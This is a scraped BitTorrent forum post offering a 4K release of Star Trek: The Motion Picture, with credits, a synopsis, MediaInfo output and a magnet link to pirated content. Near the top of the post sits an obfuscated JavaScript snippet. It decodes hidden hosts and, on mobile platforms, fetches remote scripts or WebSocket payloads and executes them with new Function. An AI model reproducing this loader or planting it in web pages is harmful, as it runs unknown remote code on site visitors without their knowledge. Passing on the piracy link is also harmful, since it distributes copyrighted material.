星际旅行1:无限太空[中文字幕].Star.Trek.The.Motion.Picture.1979.2160p.HDR.UHD.BluRay.TrueHD.7.1.x265-10bit 18.32GB

版主小s 10天前 314

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 星际旅行1:无限太空 / 星际迷航1 / 星空奇遇记1:最后战线(港) / 星舰奇航记1:星际争霸战(台) / 星际迷航之太空风云 / 星际迷航:太空风云 / 星际争霸战1 / 星舰迷航记1 / Star Trek 1

◎片 名 Star Trek: The Motion Picture

◎年 代 1979

◎产 地 美国

◎类 别 科幻 / 悬疑 / 奇幻 / 冒险

◎语 言 英语 / Klingon

◎上映日期 1979-12-06

◎IMDb链接 https://www.imdb.com/title/tt0079945/

◎豆瓣评分 7.7/10 (14174人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300089/

◎片 长 132分钟

◎导 演 罗伯特·怀斯 Robert Wise (id:1049929)

◎编 剧 哈罗德·利维斯顿 Harold Livingston (id:1052249)

吉恩·罗登贝瑞 Gene Roddenberry (id:1025307)

Alan Dean Foster Alan Dean Foster (id:1042046)

◎演 员 威廉·夏特纳 William Shatner (id:1002704)

伦纳德·尼莫伊 Leonard Nimoy (id:1002706)

德福雷斯特·凯利 DeForest Kelley (id:1055377)

詹姆斯·杜汉 James Doohan (id:1055304)

武井乔治 George Takei (id:1002752)

珀西丝·汉姆巴塔 Persis Khambatta (id:1027305)

沃尔特·凯尼格 Walter Koenig (id:1049802)

尼切尔·尼克斯 Nichelle Nichols (id:1013991)

Billy Van Zandt Billy Van Zandt (id:1036752)

马杰尔·巴雷特 Majel Barrett (id:1031978)

David Gerrold David Gerrold (id:1005570)

史蒂芬·柯林斯 Stephen Collins (id:1027854)

Christopher Doohan Christopher Doohan (id:1217189)

格雷斯·李·惠特尼 Grace Lee Whitney (id:1168409)

David Gautreaux David Gautreaux (id:1094953)

Norman Stuart Norman Stuart (id:1153193)

Bjo Trimble Bjo Trimble (id:1152369)

Marcy Lafferty Marcy Lafferty (id:1289236)

Michael Rougas Michael Rougas (id:1144122)

Franklyn Seales Franklyn Seales (id:1141768)

汤姆·莫尔加 Tom Morga (id:1292474)

马克·雷纳德 Mark Lenard (id:1119280)

Gary Faga Gary Faga (id:1084699)

Roger Aaron Brown Roger Aaron Brown (id:1078369)

Ralph Byers Ralph Byers (id:1074996)

理查德·阿诺德 Richard Arnold (id:1056445)

乔尔·克莱默 Joel Kramer (id:1055932)

Montgomery Doohan (id:1222772)

David C. Fein David C. Fein (id:1283521)

Jon Povill Jon Povill (id:1294810)

吉恩·罗登贝瑞 Gene Roddenberry (id:1025307)

杰瑞·高德史密斯 Jerry Goldsmith (id:1007116)

理查·克莱因 Richard H. Kline (id:1042362)

Todd C. Ramsay Todd C. Ramsay (id:1295199)

Marvin Paige Marvin Paige (id:1293812)

莱昂·哈里斯 Leon Harris (id:1286102)

约翰·瓦隆 John Vallone (id:1011501)

哈罗德·迈克尔逊 Harold Michelson (id:1006326)

约瑟夫·R·詹宁斯 Joseph R. Jennings (id:1287679)

琳达·德森纳 Linda DeScenna (id:1282285)

Robert Fletcher Robert Fletcher (id:1052298)

Janna Phillips Janna Phillips (id:1294457)

Barbara Minster Barbara Minster (id:1292176)

里克·斯特拉顿 Rick Stratton (id:1298538)

Carlos Yeaggy Carlos Yeaggy (id:1163728)

Fred B. Phillips Fred B. Phillips (id:1135398)

维·尼尔 Ve Neill (id:1293011)

Kevin G. Cremin Kevin G. Cremin (id:1024286)

道格拉斯·特朗布尔 Douglas Trumbull (id:1000641)

Daniel McCauley Daniel McCauley (id:1125454)

派特·迈克朗 Pat McClung (id:1291484)

格兰特·麦丘恩 Grant McCune (id:1291510)

Michael Rivero Michael Rivero (id:1139186)

David R. Morton David R. Morton (id:1292579)

保罗·D·约翰逊 Paul D. Johnson (id:1111734)

Jack Hinkle Jack Hinkle (id:1098213)

埃里克·纳什 Erik Nash (id:1292926)

Jon Erland Jon Erland (id:1080764)

大卫·K·斯图尔特 David K. Stewart (id:1298434)

Sam Nicholson Sam Nicholson (id:1293152)

Philip Barberio Philip Barberio (id:1067250)

Thane Berti Thane Berti (id:1064419)

马克·弗伦德 Mark Freund (id:1284190)

唐·特朗布尔 Don Trumbull (id:1149405)

格雷格·金布尔 Greg Kimble (id:1288555)

迈克尔·L·芬克 Michael L. Fink (id:1283733)

斯科特·法勒 Scott Farrar (id:1283472)

道格·德雷克斯勒 Doug Drexler (id:1282718)

Daren Dochterman Daren Dochterman (id:1282515)

Glenn Campbell Glenn Campbell (id:1279971)

马克·贝克 Mat Beck (id:1278183)

比尔·乔治 Bill George (id:1284713)

Deidre Le Blanc (id:1221616)

罗科·焦弗雷 Rocco Gioffre (id:1284912)

容.格瑞斯 Ron Gress (id:1285436)

Marv Ystrom Marv Ystrom (id:1165048)

Sherry Hitch Sherry Hitch (id:1286696)

理查德·E·霍兰德尔 Richard E. Hollander (id:1286808)

格雷戈里·杰恩 Gregory Jein (id:1287652)

P.J. Foley P.J. Foley (id:1283929)

克里斯托弗·S·罗斯 Christopher S. Ross (id:1296139)

罗伯特·肖特 Robert Short (id:1297515)

约翰·戴克斯特拉 John Dykstra (id:1018536)

Vicky Witt Vicky Witt (id:1164590)

丹尼斯·迈克尔逊 Dennis Michelson (id:1008486)

迈克尔·乔伊斯 Michael Joyce (id:1008348)

霍伊特·耶特曼 Hoyt Yeatman (id:1007234)

罗伯特·斯沃斯 Robert Swarthe (id:1298715)

David R. Hardberger David R. Hardberger (id:1006420)

Richard Taylor Richard Taylor (id:1299012)

罗恩·桑顿 Ron Thornton (id:1299223)

理查德·尤里西奇 Richard Yuricich (id:1301577)

马修·尤里奇 Matthew Yuricich (id:1301579)

约翰·埃利斯 John Ellis (id:1305506)

Gregory L. McMurry Gregory L. McMurry (id:1001651)

莱斯利·艾克尔 Leslie Ekker (id:1024486)

John E. Sullivan John E. Sullivan (id:1298626)

道格拉斯·特朗布尔 Douglas Trumbull (id:1000641)

道格拉斯·汉斯·史密斯 Douglas Hans Smith (id:1297879)

David Sosalla David Sosalla (id:1298080)

罗伯特·斯普尔洛克 Robert Spurlock (id:1298196)

罗伯特·艾斯威特 Robert Elswit (id:1048280)

斯科特·斯奎尔斯 Scott Squires (id:1298205)

菲尔·乔安诺 Phil Joanou (id:1041436)

查尔斯·F·维尔勒 Charles F. Wheeler (id:1039241)

马克·斯泰特森 Mark Stetson (id:1298397)

Lee Stringer Lee Stringer (id:1298555)

◎标 签 科幻 / 美国 / 星际迷航 / StarTrek / 1979 / 经典 / 美国电影 / 电影

◎简 介

寇克将军,欢迎您重返企业号!

一团硕大无朋的高能离子云,在遥远而神秘的太空中迅疾地飘移。这团能量云具有无坚不摧的威力,足以毁灭宇宙间任何物质结构。在它所划过的轨迹上,早已有好几艘分属银河三大势力的星舰遇难了……

地球-银河系星球联邦的重镇,星际舰队总部的所在地。在位于北美洲旧金山的星际联邦舰队总部,寇克将军正像往常一样百无聊赖无所事事,突然间却接到了一个再好不过的命令检视企业号准备执行紧急任务。原来地球的防卫体系己经发现了那团高能离子云,而且侦测出它正对准地球飞来。寇克将军的任务,就是要赶在它到达地球之前,率领企业号先迎上去一探究竟。

阔别了将近十年,当寇克重新登上企业号时,内心的兴奋与激动真是难以形容。可是当他 随着现任的舰长迪卡检阅过了人员与装备之后,却又不禁兴起不少陌生的感觉。因为经过 这些年来的不断改良,企业号的功能与威力都增强了许多,但也因...

◎获奖情况 (共3项)

第52届奥斯卡金像奖 (1980)

最佳视觉效果(提名)

最佳艺术指导(提名)

最佳原创配乐(提名)

└──杰瑞·高德史密斯 (id:1007116)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 58589824377964015965243087314256948790 (0x2C13FD5E542296A087685291CB046E36)

  4. Complete name : Star.Trek.The.Motio[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 18.3 GiB

  8. Duration : 2 h 12 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 19.9 Mb/s

  11. Movie name : Star Trek The Motion Picture 1979 2160p HDR UHD BluRay TrueHD 7.1 [email protected]

  12. Encoded date : UTC 2021-09-13 09:11:00

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. HDR format : SMPTE ST 2086, HDR10 compatible

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 12 min

  23. Bit rate : 14.1 Mb/s

  24. Width : 3 840 pixels

  25. Height : 1 632 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.094

  33. Stream size : 13.0 GiB (71%)

  34. Title : @HDSky

  35. Writing library : x265 - H.265/HEVC codec

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : BT.2020

  43. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 739 cd/m2

  45. Maximum Frame-Average Light Level : 331 cd/m2


  46. Audio

  47. ID : 2

  48. Format : MLP FBA

  49. Format/Info : Meridian Lossless Packing FBA

  50. Commercial name : Dolby TrueHD

  51. Codec ID : A_TRUEHD

  52. Duration : 2 h 11 min

  53. Bit rate mode : Variable

  54. Bit rate : 5 633 kb/s

  55. Maximum bit rate : 8 199 kb/s

  56. Channel(s) : 8 channels

  57. Channel layout : L R C LFE Ls Rs Lb Rb

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 1 200.000 FPS (40 SPF)

  60. Compression mode : Lossless

  61. Stream size : 5.19 GiB (28%)

  62. Title : English

  63. Language : English

  64. Default : Yes

  65. Forced : No


  66. Text #1

  67. ID : 3

  68. Format : PGS

  69. Muxing mode : zlib

  70. Codec ID : S_HDMV/PGS

  71. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  72. Duration : 2 h 2 min

  73. Bit rate : 27.6 kb/s

  74. Count of elements : 2142

  75. Stream size : 24.2 MiB (0%)

  76. Title : ENG

  77. Language : English

  78. Default : Yes

  79. Forced : No


  80. Text #2

  81. ID : 4

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 2 h 3 min

  87. Bit rate : 21.6 kb/s

  88. Count of elements : 1883

  89. Stream size : 19.2 MiB (0%)

  90. Title : CHS

  91. Language : Chinese

  92. Default : No

  93. Forced : No


  94. Text #3

  95. ID : 5

  96. Format : PGS

  97. Muxing mode : zlib

  98. Codec ID : S_HDMV/PGS

  99. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration : 2 h 3 min

  101. Bit rate : 22.0 kb/s

  102. Count of elements : 1883

  103. Stream size : 19.5 MiB (0%)

  104. Title : CHT

  105. Language : Chinese

  106. Default : No

  107. Forced : No


  108. Text #4

  109. ID : 6

  110. Format : PGS

  111. Muxing mode : zlib

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 2 h 3 min

  115. Bit rate : 37.9 kb/s

  116. Count of elements : 1920

  117. Stream size : 33.4 MiB (0%)

  118. Title : CHS&ENG

  119. Language : Chinese

  120. Default : No

  121. Forced : No


  122. Text #5

  123. ID : 7

  124. Format : PGS

  125. Muxing mode : zlib

  126. Codec ID : S_HDMV/PGS

  127. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration : 2 h 3 min

  129. Bit rate : 38.4 kb/s

  130. Count of elements : 1920

  131. Stream size : 33.7 MiB (0%)

  132. Title : CHT&ENG

  133. Language : Chinese

  134. Default : No

  135. Forced : No


  136. Menu

  137. 00:00:00.000 : en:Chapter 01

  138. 00:01:41.518 : en:Chapter 02

  139. 00:08:50.904 : en:Chapter 03

  140. 00:11:49.290 : en:Chapter 04

  141. 00:20:46.202 : en:Chapter 05

  142. 00:25:12.969 : en:Chapter 06

  143. 00:28:01.179 : en:Chapter 07

  144. 00:31:31.221 : en:Chapter 08

  145. 00:38:02.822 : en:Chapter 09

  146. 00:44:36.382 : en:Chapter 10

  147. 00:48:07.759 : en:Chapter 11

  148. 00:55:28.282 : en:Chapter 12

  149. 01:01:15.380 : en:Chapter 13

  150. 01:12:20.627 : en:Chapter 14

  151. 01:17:28.851 : en:Chapter 15

  152. 01:21:55.201 : en:Chapter 16

  153. 01:27:21.319 : en:Chapter 17

  154. 01:38:14.220 : en:Chapter 18

  155. 01:46:18.204 : en:Chapter 19

  156. 01:51:56.917 : en:Chapter 20

  157. 02:08:36.250 : en:Chapter 21


TAGS 奇幻 冒险 悬疑 科幻

磁力链:
  • magnet:?xt=urn:btih:B47947220E95666D0F1745DF5941787837201C2F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回